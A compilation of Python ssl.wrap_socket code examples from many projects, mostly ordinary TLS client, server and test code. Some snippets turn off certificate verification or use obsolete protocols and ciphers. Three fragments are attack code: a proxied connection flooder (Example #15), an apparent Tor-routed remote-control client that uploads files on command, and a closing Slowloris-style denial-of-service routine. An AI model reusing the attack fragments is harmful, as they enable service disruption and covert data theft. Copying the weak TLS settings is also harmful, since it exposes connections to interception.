Example #1
0
    def connect(self):
        ssl_version = FOUND_SSL_PROTOCOLS.get(self.host)
        if ssl_version is not None:
            self.sock = ssl.wrap_socket(
                self._create_socket(),
                self.key_file,
                self.cert_file,
                ssl_version=ssl_version)

        else:
            while True:
                to_try = TRY_SSL_PROTOCOLS[self.host]
                if not to_try:
                    TRY_SSL_PROTOCOLS.pop(self.host, None)
                    message = u('Could not open ssl url: %s') % self.host
                    raise Error('url', message)
                ssl_version = to_try.pop(0)

                try:
                    self.sock = ssl.wrap_socket(
                        self._create_socket(),
                        self.key_file,
                        self.cert_file,
                        ssl_version=ssl_version)
                except ssl.SSLError:
                    continue

                FOUND_SSL_PROTOCOLS[self.host] = ssl_version
                break
def do_connect(host, port, use_ssl, timeout=None):

    # do IPv4
    if not is_v6(host):
        if use_ssl:
            s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)

            #defaults to PROTOCOL_v23 in client mode.  ciphers will be negotiated based on handshake from server
            sock = ssl.wrap_socket( s )
            #sock.setblocking(False)
        else:
            sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
            #fcntl.fcntl(sock, fcntl.F_SETFL, os.O_NONBLOCK)

    # do IPv6
    else:
        if use_ssl:
            s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
            sock = ssl.wrap_socket( s )
            #sock.setblocking(False)
        else:
            sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
            #fcntl.fcntl(sock, fcntl.F_SETFL, os.O_NONBLOCK)

    # don't block
    sock.setblocking(False)
    sock.settimeout(timeout)

    # light this candle
    sock.connect((host,port))

    return sock
Example #3
0
    def wrap_socket(sock, verify_cert, ca_certs):
        cafiles = []
        cafiles = [
            '/etc/ssl/certs/ca-certificates.crt',  # ubuntu/debian
            '/etc/pki/tls/certs/ca-bundle.crt',    # redhat/centos
            '/etc/ssl/cert.pem',                   # openbsd
        ]
        if not verify_cert:
            return ssl.wrap_socket(sock)
        if not ca_certs:
            for f in cafiles:
                if os.path.isfile(f):
                    ca_certs = f
                    continue
        if ca_certs is not None:
            return ssl.wrap_socket(sock,
                                   cert_reqs=ssl.CERT_REQUIRED,
                                   ca_certs=ca_certs)

        tempdir = tempfile.mkdtemp()
        try:
            filename = os.path.join(tempdir, "cert")
            temp = open(filename, "w+b")
            try:
                temp.write(WRAP_CERT)
            finally:
                temp.close()

            return ssl.wrap_socket(sock,
                                   cert_reqs=ssl.CERT_REQUIRED,
                                   ca_certs=filename)
        finally:
            shutil.rmtree(tempdir)
Example #4
0
    def _socket_connect(self):
        """Create socket and connect to it, using SSL if enabled."""
        # Create our socket and set our socket options
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        self.socket.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)

        # Wrap the SSL socket if we SSL turned on
        ssl_text = ""
        if self.parameters.ssl:
            ssl_text = " with SSL"
            if self.parameters.ssl_options:
                # Always overwrite this value
                self.parameters.ssl_options['do_handshake_on_connect'] = \
                    self._ssl_handshake
                self.socket = ssl.wrap_socket(self.socket,
                                              **self.parameters.ssl_options)
            else:
                self.socket = ssl.wrap_socket(self.socket,
                                              do_handshake_on_connect= \
                                                  self._ssl_handshake)

            # Flags for SSL handshake negotiation
            self._ssl_connecting = True

        # Try and connect
        log.info("Connecting fd %d to %s:%i%s", self.socket.fileno(),
                 self.parameters.host,
                 self.parameters.port, ssl_text)
        self.socket.settimeout(CONNECTION_TIMEOUT)
        self.socket.connect((self.parameters.host,
                             self.parameters.port))

        # Set the socket to non-blocking
        self.socket.setblocking(0)
Example #5
0
def SSLWrapper(sock, verify):
    """ Wraps a socket in ssl - requires pythons ssl module """
    try:
        import ssl
        if not verify:
            # not verifying, just wrap and return
            return ssl.wrap_socket(sock)

        # okay now verifying.
        if not os.path.isfile("Data/cert.pem"):
            print "[ErrorLine] Data/cert.pem file doesn't exit, can't verify"
            sys.exit()

        return ssl.wrap_socket(sock, ca_certs="Data/cert.pem", cert_reqs=ssl.CERT_REQUIRED)

    except ImportError:
        print "[ErrorLine] No 'ssl' module, please install it."
    except Exception:
        print "[ErrorLine] SSL error:"
        traceback.print_exc()
    # only if it's failed (as successful call would have return by now)
    try:
        sock.close()
    except Exception:
        pass
    
    sys.exit()
Example #6
0
    def _get_ssl_socket(self, stream, **kwargs):
        # This makes it simpler for SMTP_SSL to use the SMTP connect code
        # and just alter the socket connection bit.
        callback = kwargs.pop('callback')
        if hasattr(self, '__get_ssl_socket'):
            callback(self.__get_ssl_socket)
            return

        if PY3:
            # due to ssl wrap_socket will detach argument sock in Python 3 and
            # can't be used no longer.Also the behaviour of socket.socket.close
            # is different between 2 and 3.
            sock = stream.socket
            iden_sock = socket.fromfd(sock.fileno(), sock.family, sock.type)
            ssl_sock = ssl.wrap_socket(
                iden_sock, do_handshake_on_connect=False, **kwargs)
            stream.close()
        else:
            ssl_sock = ssl.wrap_socket(
                stream.socket, do_handshake_on_connect=False, **kwargs)
            stream.close()

        stream = iostream.SSLIOStream(ssl_sock)
        self.__get_ssl_socket = stream
        callback(stream)
Example #7
0
def _wrap_socket(sock):
  if conf.ssl_verify or conf.ssl_reverse:
    return ssl.wrap_socket(sock, ssl_version=conf._ssl_version,
                           cert_reqs=ssl.CERT_REQUIRED,
                           ca_certs=conf.ssl_verify)
  else:
    return ssl.wrap_socket(sock, ssl_version=conf._ssl_version)
Example #8
0
    def get_socket(self):
        if self.use_ssl:
            cert_path = os.path.join(self.config_path, 'certs', self.host)
            if not os.path.exists(cert_path):
                is_new = True
                s = self.get_simple_socket()
                if s is None:
                    return
                # try with CA first
                try:
                    s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23, cert_reqs=ssl.CERT_REQUIRED, ca_certs=ca_path, do_handshake_on_connect=True)
                except ssl.SSLError, e:
                    s = None
                if s and self.check_host_name(s.getpeercert(), self.host):
                    self.print_error("SSL certificate signed by CA")
                    return s
                # get server certificate.
                # Do not use ssl.get_server_certificate because it does not work with proxy
                s = self.get_simple_socket()
                if s is None:
                    return
                try:
                    s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23, cert_reqs=ssl.CERT_NONE, ca_certs=None)
                except ssl.SSLError, e:
                    self.print_error("SSL error retrieving SSL certificate:", e)
                    return

                dercert = s.getpeercert(True)
                s.close()
                cert = ssl.DER_cert_to_PEM_cert(dercert)
                # workaround android bug
                cert = re.sub("([^\n])-----END CERTIFICATE-----","\\1\n-----END CERTIFICATE-----",cert)
                temporary_path = cert_path + '.temp'
                with open(temporary_path,"w") as f:
                    f.write(cert)
Example #9
0
        def connect(self):
            sock = socket.create_connection((self.host, self.port), self.timeout)

            if (self.need_server_auth == True):
                self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ca_certs=self.ca_file, cert_reqs=ssl.CERT_REQUIRED)
            else:
                self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ca_certs=self.ca_file)
 def _openConnection(self):
     """
     open the (SSL) socket and return True.
     # TODO: support server certificate validation, provide client cert
     """
     try:
         self._log("python default ssl connection failed, trying TLSv1", 2)
         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         s.connect((self._hostname, self._port))
         self._socket = ssl.wrap_socket(s, self._keyfile, self._certfile, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="AES256-SHA")
         return True
     except ssl.SSLError:
         try:
             s.close()
         except:
             pass
         raise Exception("Error setting up the SSL/TLS socket to murmur.")
     try:
         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         s.connect((self._hostname, self._port))
         self._log("trying python default ssl socket", 3)
         self._socket = ssl.wrap_socket(s)
         return True
     except ssl.SSLError:
         try:
             s.close()
         except:
             pass
Example #11
0
    def connect(self):
        # If the ssl library is not available, then we just have to fall back on old HTTPSConnection.connect
        # method.  There are too many dependencies to implement it directly here.
        if not self.__has_ssl:
            # Unfortunately, the only way to set timeout is to temporarily set the global default timeout
            # for what it should be for this connection, and then reset it once the connection is established.
            # Messy, but not much we can do.
            old_timeout = None
            try:
                old_timeout = socket.getdefaulttimeout()
                socket.setdefaulttimeout(self.__timeout)
                httplib.HTTPSConnection.connect(self)
                return
            finally:
                socket.setdefaulttimeout(old_timeout)

        # Create the underlying socket.  Prefer Python's newer socket.create_connection method if it is available.
        if hasattr(socket, 'create_connection'):
            self.sock = socket.create_connection((self.host, self.port), self.__timeout)
        else:
            self.sock = create_connection_helper(self.host, self.port, timeout=self.__timeout)

        if self._tunnel_host:
            self._tunnel()

        # Now ask the ssl library to wrap the socket and verify the server certificate if we have a ca_file.
        if self.__ca_file is not None:
            self.sock = ssl.wrap_socket(self.sock, ca_certs=self.__ca_file, cert_reqs=ssl.CERT_REQUIRED)
        else:
            self.sock = ssl.wrap_socket(self.sock, cert_reqs=ssl.CERT_NONE)
Example #12
0
    def connect(self):
        import sys
        if sys.version_info >= (2,7,0):
            sock = socket.create_connection((self.host, self.port), self.timeout, self.source_address)
        else:
            sock = socket.create_connection((self.host, self.port), self.timeout)

        # Note these next fixes require python at least from Oct 2009 so 2.6.3
        if sys.version_info >= (2,6,3):
            if self._tunnel_host:
                self.sock = sock
                self._tunnel()

        # Force use of TLSv1 with PROTOCOL_TLSv1
        # Default is PROTOCOL_SSLv23 which allows either 2 or 3
        # Another option is PROTOCOL_SSLv3
        # We want TLS1 to avoid POODLE vulnerability. In addition, some client/server combinations fail the handshake
        # if you start with SSL23 and the server wants TLS1. See geni-tools issue #745
        if self.ssl_version is None:
            #print "Requested a None ssl version"
            self.ssl_version = ssl.PROTOCOL_TLSv1
        #print "Wrapping socket to use SSL version %s" % ssl._PROTOCOL_NAMES[self.ssl_version]

        if sys.version_info >= (2,7,0):
            #if self.ciphers is None:
            #    print "Using cipherlist: 'DEFAULT:!aNULL:!eNULL:!LOW:!EXPORT:!SSLv2'"
            #else:
            #    print "Using cipherlist: '%s'" % self.ciphers
            self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=self.ssl_version, ciphers=self.ciphers)
        else:
            # Python 2.6 doesn't let you specify the ciphers to use
            self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=self.ssl_version)
Example #13
0
    def testConnect(self):
        s = ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_NONE)
        s.connect(("svn.python.org", 443))
        c = s.getpeercert()
        if c:
            raise test_support.TestFailed("Peer cert %s shouldn't be here!")
        s.close()

        # this should fail because we have no verification certs
        s = ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_REQUIRED)
        try:
            s.connect(("svn.python.org", 443))
        except ssl.SSLError:
            pass
        finally:
            s.close()

        # this should succeed because we specify the root cert
        s = ssl.wrap_socket(
            socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_REQUIRED, ca_certs=SVN_PYTHON_ORG_ROOT_CERT
        )
        try:
            s.connect(("svn.python.org", 443))
        except ssl.SSLError, x:
            raise test_support.TestFailed("Unexpected exception %s" % x)
Example #14
0
def handshake(host, port, ticket, cfg_file, thumbprint):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    expect(sock, VMAD_WELCOME)
    sock = ssl.wrap_socket(sock)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    cert = sock.getpeercert(binary_form=True)
    h = hashlib.sha1()
    h.update(cert)
    if thumbprint != h.hexdigest():
        raise Exception("Server thumbprint doesn't match")
    sock.write("%s %s\r\n" % (VMAD_USER_CMD, ticket))
    expect(sock, VMAD_NEEDPASSWD)
    sock.write("%s %s\r\n" % (VMAD_PASS_CMD, ticket))
    expect(sock, VMAD_LOGINOK)
    rand = os.urandom(12)
    rand = base64.b64encode(rand)
    sock.write("%s %s\r\n" % (VMAD_THUMB_CMD, rand))
    thumbprint2 = expect(sock, VMAD_OK)
    thumbprint2 = thumbprint2.replace(':', '').lower()
    sock.write("%s %s mks\r\n" % (VMAD_CONNECT_CMD, cfg_file))
    expect(sock, VMAD_OK)
    sock2 = ssl.wrap_socket(sock)
    cert2 = sock2.getpeercert(binary_form=True)
    h = hashlib.sha1()
    h.update(cert2)
    if thumbprint2 != h.hexdigest():
        raise Exception("Second thumbprint doesn't match")
    sock2.write(rand)
    return sock2
Example #15
0
    def build_sockets(self):
        self.debug.put('Socket Builder started.')
        count = 0
        while (self.options['attacklimit'] == 0 or self.options['attacklimit'] > self.attacks) and self.running:
            if self.options['connectionlimit'] > self.sockets:
                if self.options['socksversion'] == 'SOCKS4' or self.options['socksversion'] == 'SOCKS5' or self.options['socksversion'] == 'HTTP':
                    if self.options['socksversion'] == 'SOCKS4': proxytype = socks.PROXY_TYPE_SOCKS4
                    elif self.options['socksversion'] == 'SOCKS5': proxytype = socks.PROXY_TYPE_SOCKS5
                    else: proxytype = socks.PROXY_TYPE_HTTP
                    s = socks.socksocket()
                    if self.options['socksuser'] == '' and self.options['sockspass'] == '':
                        s.setproxy(proxytype, self.options['sockshost'], self.options['socksport'], self.options['socksuser'], self.options['sockspass'])
                    else:
                        s.setproxy(proxytype, self.options['sockshost'], self.options['socksport'])
                else:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

                try:
                    s.connect((self.options['host'], self.options['port']))
                    if self.options['ssl'] ==  True:
                        wrap_socket(s)
                    self.connections.put((s, 0))
                    self.debug.put('Socket opened, connection created.')
                    self.attacks += 1
                    self.sockets += 1
                except Exception, ex:
                    self.errors.put('Could not connect. %s.' % (ex))
                    
            if self.options['timebetweenconnections'] > 0:
                time.sleep(self.options['timebetweenconnections'])
Example #16
0
    def start(self):
        self.server = self.config['server']
        self.port = int(self.config['port'])
        if self.config['proxyhost'] is None:
            if self.config['ssl'] is True:
                if self.ipv6:
                    self.sock = wrap_socket(socket.socket(socket.AF_INET6, socket.SOCK_STREAM))
                else:
                    self.sock = wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
            else:
                if self.ipv6:
                    self.sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
                else:
                    self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        else:
            if self.config['ssl'] is True:
                temp_socket = socks.socksocket()
                temp_socket.setproxy(socks.PROXY_TYPE_SOCKS4, self.config['proxyhost'], self.config['proxyport'], True)
                self.sock = wrap_socket(temp_socket)
            else:
                self.sock = socks.socksocket()
                self.sock.setproxy(socks.PROXY_TYPE_SOCKS4, self.config['proxyhost'], self.config['proxyport'], True)
        self.sock.connect((self.server, self.port))

        #send pass
        if self.config["pass"] is not None:
            self.send("PASS " + self.config["pass"], True)

        self.send("USER " + self.user + " 127.0.0.1 " + self.server + " :" + self.real, True)
        self.set_nick(self.nick)
        self.main()
 def connect(self, host, port):
     self.dispatcher = RabbitDispatcher(self)
     self.dispatcher.create_socket(socket.AF_INET, socket.SOCK_STREAM)
     # Wrap the SSL socket if we SSL turned on
     if self.parameters.ssl:
         self.dispatcher.socket.setblocking(1)
         if self.parameters.ssl_options:
             self.dispatcher.socket = ssl.wrap_socket(self.dispatcher.socket,
                                           **self.parameters.ssl_options)
         else:
             self.dispatcher.socket = ssl.wrap_socket(self.dispatcher.socket)
             
         # Fix 2.7.1+ SSL socket bug
         # If Python version is 2.7.1, we should connect it first,
         # then everything works OK
         # if we use Python 2.7.2, and we connect it first, then we will get a
         # double connect exception.
         # so we only connect the socket when Python version is 2.7.1
         if platform.python_version().startswith("2.7.1"):
             self.dispatcher.socket.connect((host, port or spec.PORT))
     
     # Set the socket to non-blocking
     if not self.parameters.ssl:
         self.dispatcher.socket.setblocking(0)
     self.dispatcher.connect((host, port or spec.PORT))
Example #18
0
def socket_with_cert(cert_path, key_path, cacert_path, server_cert = True):
    cert_path = os.path.join(_support.DATA_DIR, cert_path)
    key_path = os.path.join(_support.DATA_DIR, key_path)
    cacert_path = os.path.join(_support.DATA_DIR, cacert_path)
    listen_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listen_sock.bind(("127.0.0.1", 0))
    listen_sock.listen(1)
    addr = listen_sock.getsockname()
    def thread_func():
        try:
            sock = listen_sock.accept()[0]
            sock.setblocking(True) # pylint: disable=E1101
            try:
                ssl.wrap_socket(sock, key_path, cert_path,
                             server_side = server_cert, ca_certs = cacert_path)
            finally:
                sock.close()
        finally:
            listen_sock.close()
    thread = threading.Thread(target = thread_func, 
                        name = "pyxmpp2.test.cert certificate provider thread")
    thread.daemon = True
    thread.start()
    client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_sock.connect(addr)
    if server_cert:
        return ssl.wrap_socket(client_sock, cert_reqs = ssl.CERT_REQUIRED,
                        server_side = False, ca_certs = cacert_path)
    else:
        s_cert_path = os.path.join(_support.DATA_DIR, "server.pem")
        s_key_path = os.path.join(_support.DATA_DIR, "server-key.pem")
        return ssl.wrap_socket(client_sock, s_key_path, s_cert_path,
                        cert_reqs = ssl.CERT_REQUIRED, server_side = True,
                                                    ca_certs = cacert_path)
Example #19
0
    def connect(self):
        """Connect to a host on a given (SSL) port.
        Use ca_file to check Server Certificate.

        Redefined/copied and extended from httplib.py:1105 (Python 2.6.x).
        This is needed to pass cert_reqs=ssl.CERT_REQUIRED as parameter to
        ssl.wrap_socket(), which forces SSL to check server certificate against
        our client certificate.
        """
        source_address = getattr(self, 'source_address', None)
        socket_args = [(self.host, self.port), self.timeout] + (
            [source_address, ] if source_address else [])
        sock = socket.create_connection(*socket_args)
        if self._tunnel_host:
            self.sock = sock
            self._tunnel()

        try:
            if self.ignore_ssl:
                self.sock = ssl.wrap_socket(
                    sock, self.key_file, self.cert_file,
                    cert_reqs=ssl.CERT_NONE)
            else:
                self.sock = ssl.wrap_socket(
                    sock, self.key_file, self.cert_file,
                    ca_certs=self.ca_file, cert_reqs=ssl.CERT_REQUIRED)
        except UnicodeError as ue:
            raise SSLUnicodeError(0, SSLUnicodeError.__doc__, ue)
Example #20
0
 def urfa_login(self):
     """
     handshake and login
     """
     self.sck.connect((self.addr, self.port))
     self.pck.recv(self.sck)
     session_id = self.pck.attr[U_CODE_ATTR_SID]['data']
     auth_hash_digest = hashlib.new('md5')
     auth_hash_digest.update(session_id)
     auth_hash_digest.update(self.passwd)
     auth_hash = auth_hash_digest.digest()
     self.pck.init(code=U_PKT_REQ)
     if self.admin:
         login_type = U_LGN_SYS
         ssl_type = U_SSLT_RSACRT
     else:
         login_type = U_LGN_USR
         ssl_type = U_SSLT_SSL3
     self.pck.add_attr(U_CODE_ATTR_LGN_T, login_type, U_TP_I)
     self.pck.add_attr(U_CODE_ATTR_LGN, self.login, U_TP_S)
     self.pck.add_attr(U_CODE_ATTR_DGS, session_id, U_TP_S)
     self.pck.add_attr(U_CODE_ATTR_HSH, auth_hash, U_TP_S)
     self.pck.add_attr(U_CODE_ATTR_SSL, ssl_type, U_TP_I)
     self.pck.send(self.sck)
     self.pck.recv(self.sck)
     if self.pck.code == U_PKT_ACCEPT:
         if self.admin:
             self.sck = ssl.wrap_socket(self.sck, certfile=self.crt_file, ssl_version=ssl.PROTOCOL_SSLv3)
         else:
             self.sck = ssl.wrap_socket(self.sck, ciphers='ADH-RC4-MD5', ssl_version=ssl.PROTOCOL_SSLv3)
Example #21
0
        def test_handshake_timeout(self):
            # Issue #5103: SSL handshake must respect the socket timeout
            server = socket.socket(socket.AF_INET)
            host = "127.0.0.1"
            port = test_support.bind_port(server)
            started = threading.Event()
            finish = False

            def serve():
                server.listen(5)
                started.set()
                conns = []
                while not finish:
                    r, w, e = select.select([server], [], [], 0.1)
                    if server in r:
                        # Let the socket hang around rather than having
                        # it closed by garbage collection.
                        conns.append(server.accept()[0])

            t = threading.Thread(target=serve)
            t.start()
            started.wait()

            try:
                try:
                    c = socket.socket(socket.AF_INET)
                    c.settimeout(0.2)
                    c.connect((host, port))
                    # Will attempt handshake and time out
                    try:
                        ssl.wrap_socket(c)
                    except ssl.SSLError, e:
                        self.assertTrue("timed out" in str(e), str(e))
                    else:
                        self.fail("SSLError wasn't raised")
    def connect(self):
        # overrides the version in httplib so that we do certificate verification
        try:
            # this is a convenience function added in python 2.6
            sock = socket.create_connection((self.host, self.port), self.timeout)
        except AttributeError:
            # There is no timeout attribute in earlier versions of this object.
            # The only option available is to set a global default timeout for
            # all socket objects.
            socket.setdefaulttimeout(10)
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((self.host, self.port))

        # This code is not available for older versions of python and seems to
        # have no effect on establishing a verified https connection.
        #if self._tunnel_host:
        #    self.sock = sock
        #    self._tunnel()

        # wrap the socket using verification with the Thawte root cert
        if VerifiedHTTPSConnection.do_verification:
            self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, cert_reqs=ssl.CERT_REQUIRED, ca_certs=self.certs_file) 
            if VerifiedHTTPSConnection.do_domain_verification:
                cert_subject = self.sock.getpeercert()['subject']
                cert_dict = {}
                for c in cert_subject:
                    cert_dict.update(c)
                cert_host = cert_dict['commonName']
                if self.host != cert_host:
                    raise SSLVerificationError("Certificate doesn't match domain; untrusted connection")
        else:
            self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file) 
Example #23
0
    def connect(self):
        """
        Connect to a host on a given port and check the certificate
        This is almost the same than the conect of HTTPSConnection, but adds
        some function for SSL certificate verification
        """

        sock = socket.create_connection((self.host, self.port), self.timeout)
        if self._tunnel_host:
            self.sock = sock
            self._tunnel()

        if self.ca_file:
            self.sock = ssl.wrap_socket(sock,
                                        self.key_file,
                                        self.cert_file,
                                        ca_certs = self.ca_file,
                                        cert_reqs=ssl.CERT_REQUIRED)
        else:
            self.sock = ssl.wrap_socket(sock,
                                        self.key_file,
                                        self.cert_file,
                                        cert_reqs=ssl.CERT_NONE)

        self.certificate = self.sock.getpeercert(True)
        if self.callBack:
            if not self.callBack(self.certificate):
                raise ssl.SSLError(1, "Call back verification failed")
Example #24
0
  def connect(self, attempts=1, peer=None):
    for i in range(0, attempts):
      try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(TIMEOUT)
        if self.cert != None:
          self.socket = ssl.wrap_socket(sock,
            keyfile='{0}.key'.format(self.cert),
            certfile='{0}.crt'.format(self.cert),
            ca_certs='{0}.crt'.format(self.ca),
            cert_reqs=ssl.CERT_REQUIRED,
            ssl_version=self.ssl_version)
        else:
          self.socket = ssl.wrap_socket(sock,
            ca_certs='{0}.crt'.format(self.ca),
            cert_reqs=ssl.CERT_REQUIRED,
            ssl_version=self.ssl_version)
        self.socket.connect((LOCALHOST, self.port))

        if peer != None:
          if self.socket.getpeercert()['subject'][3][0][1] == peer:
            return self
          else:
            print("Did not connect to expected peer: {0}".format(self.socket.getpeercert()))
        else:
          return self
      except Exception as e:
        print(e)
        if attempts==1:
          raise e
      print("Trying to connect to {0}...".format(self.port))
      time.sleep(1)
    raise Exception("did not connect to peer")
    def start(self):
        """
        Creates a SSL connection to the iDigi Server and sends a
        ConnectionRequest message.
        """
        self.log.info("Starting SSL Session for Monitor %s."
                      % self.monitor_id)
        if self.socket is not None:
            raise Exception("Socket already established for %s." % self)

        try:
            # Create socket, wrap in SSL and connect.
            self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Validate that certificate server uses matches what we expect.
            if self.ca_certs is not None:
                self.socket = ssl.wrap_socket(self.socket,
                                              cert_reqs=ssl.CERT_REQUIRED,
                                              ca_certs=self.ca_certs)
            else:
                self.socket = ssl.wrap_socket(self.socket)

            self.socket.connect((self.client.hostname, PUSH_SECURE_PORT))
            self.socket.setblocking(0)
        except Exception as exception:
            self.socket.close()
            self.socket = None
            raise exception

        self.send_connection_request()
Example #26
0
    def connect(self):
        """ Connect to a host on a given (SSL) port.
            Use ca_file pointing somewhere, use it to check Server Certificate.
            Redefined/copied and extended from httplib.py:1105 (Python 2.6.x).
        """
        host = self.host
        port = self.port
        sock = socket.create_connection((self.host, self.port), self.timeout)

        LOG.debug(_("Connecting to Https server host %(host)s port %(port)s " % locals()))

        if self._tunnel_host:
            self.sock = sock
            self._tunnel()
        # If there's no CA File, don't force Server Certificate Check
        if self.ca_file:
            self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
                        ssl_version=ssl.PROTOCOL_SSLv23,
                        ca_certs=self.ca_file,
                        cert_reqs=ssl.CERT_REQUIRED)
            LOG.debug(_("Https server certified " % locals()))
            s = self.sock
            cert = s.getpeercert()
        else:
            self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
                                                cert_reqs=ssl.CERT_NONE)
Example #27
0
def _http_connect(hostname, port, use_ssl):
  p_url = urlparse.urlparse(conf.proxy)
  p_hostname = p_url.hostname
  p_port = p_url.port
  p_use_ssl = True if p_url.scheme[-1] == 's' else False
  try:
    sock = socket.create_connection((p_hostname, p_port))
  except socket.error:
    raise ProxyError("Unable to connect to the proxy")
  if p_use_ssl:
    try:
      # No check is made to verify proxy certificate
      sock = ssl.wrap_socket(sock, ssl_version=conf._ssl_version)
    except socket.error:
      raise ProxyError("Unable to use SSL with the proxy")
  if use_ssl:
    f = sock.makefile("rwb", 0)
    f.write("CONNECT {}:{} HTTP/1.1\r\n\r\n".format(hostname, port))
    try:
      v, s, m = read_banner(f)
    except ValueError:
      raise BadStatusLine()
    if s != "200":
      raise ProxyError("Bad status " + s + " " + m)
    _ = read_headers(f)
    sock = ssl.wrap_socket(sock, ssl_version=conf._ssl_version)
  return sock
        def SSL_Connect(ctx, sock,
                        server_side=False, accepted=False, connected=False,
                        verify_names=None):
            if DEBUG: DEBUG('*** TLS is provided by native Python ssl')
            reqs = (verify_names and ssl.CERT_REQUIRED or ssl.CERT_NONE)
            try:
                fd = ssl.wrap_socket(sock, keyfile=ctx.privatekey_file,
                                           certfile=ctx.certchain_file,
                                           cert_reqs=reqs,
                                           ca_certs=ctx.ca_certs,
                                           do_handshake_on_connect=False,
                                           ssl_version=ctx.method,
                                           ciphers=ctx.ciphers,
                                           server_side=server_side)
            except:
                fd = ssl.wrap_socket(sock, keyfile=ctx.privatekey_file,
                                           certfile=ctx.certchain_file,
                                           cert_reqs=reqs,
                                           ca_certs=ctx.ca_certs,
                                           do_handshake_on_connect=False,
                                           ssl_version=ctx.method,
                                           server_side=server_side)

            if verify_names:
                fd.do_handshake()
                if not SSL_CheckPeerName(fd, verify_names):
                    raise SSL.Error(('Cert not in %s (%s)'
                                     ) % (verify_names, reqs))
            return fd
Example #29
0
        def connect(self):
            try:
                sock = socket.create_connection(
                    (self.host, self.port),
                    self.timeout
                )
            except AttributeError:
                # Python 2.4 compatibility (does not deal with IPv6)
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.connect((self.host, self.port))

            try:
                if self._tunnel_host:
                    self.sock = sock
                    self._tunnel()
            except AttributeError:
                # Python 2.4 compatibility (_tunnel_host not defined)
                pass

            try:
                self.sock = ssl.wrap_socket(
                    sock, self.key_file, self.cert_file,
                    ssl_version=ssl.PROTOCOL_TLSv1
                )
            except ssl.SSLError:
                self.sock = ssl.wrap_socket(
                    sock, self.key_file, self.cert_file,
                    ssl_version=ssl.PROTOCOL_SSLv23
                )
def test_for_leaks():
    # Let's test for leaks first
    p_server = compile_and_invoke( "t2_tls_leaks.hs" )
    ld = LeakDetector(p_server.pid)
    sockets = []
    time.sleep(1.0)
    for i in range(200):
        conn = wrap_socket( socket.create_connection(("127.0.0.1", 8090)) )
        sockets.append(conn)

    repeats = 12
    exercises = 50

    for i in range(repeats):
        ld.sample()
        nsockets = []
        for i in range(exercises):
            conn = wrap_socket( socket.create_connection(("127.0.0.1", 8090)) )
            nsockets.append(conn)
        for ns in nsockets:
            ns.close()

    n = repeats * exercises
    re = rconnect()
    ensure(re.counter("socket-close-called")>1, "not even a socket-close called")
    ensure(re.counter("socket-close-called")>= n, "not enough closed sockets")
    ensure(re.counter("socket-shutdown-executed")>= n, "not enough sockets shutdown")
    ensure(re.counter("socket-close-executed")>= n, "not enough sockets closed")
    ensure(re.counter("stable-pointer-freed")>1, "we are leaking stable pointers")

    ensure(not ld.leaks(sample_size=repeats//2), "It's leaking memory!")
    os.kill(-p_server.pid, signal.SIGTERM)
Example #31
0
        print("Cert ok")
    else:
        print "nope"
else:
    with open("certificate.pem", "wa") as out:
        out.write(certificate)
        out.close()
        print("Cert generated")

sock = socks.socksocket()
sock.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
sock.connect((host, 5555))
#ca_certs="certificate.pem"

ssl_sock = ssl.wrap_socket(sock,
                           ca_certs="server.crt",
                           cert_reqs=ssl.CERT_REQUIRED)

print repr(ssl_sock.getpeername())
print ssl_sock.cipher()
infosServer = ssl_sock.getpeercert()
#ssl.match_hostname(infosServer,host)
#SendData(cType)

while 1:
    inText = RecvData()
    if inText.startswith("download"):
        UploadFILE(inText.split("|")[1])
    elif inText == "alive":
        SendData(cType + " :: alive")
    elif inText.startswith("info"):
Example #32
0
def slow(conn, socks_type):
    proxy = random.choice(proxies).strip().split(":")
    if socks_type == 4:
        socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]),
                              int(proxy[1]), True)
    if socks_type == 5:
        socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]),
                              int(proxy[1]), True)
    for _ in range(conn):
        try:
            s = socks.socksocket()
            s.settimeout(0.6)
            s.connect((str(ip), int(port)))
            if str(port) == '443':
                s = ssl.wrap_socket(s)
            s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(
                0, 2000)).encode("utf-8"))  # Slowloris format header
            s.send("User-Agent: {}\r\n".format(
                random.choice(useragents)).encode("utf-8"))
            s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode(
                "utf-8"))
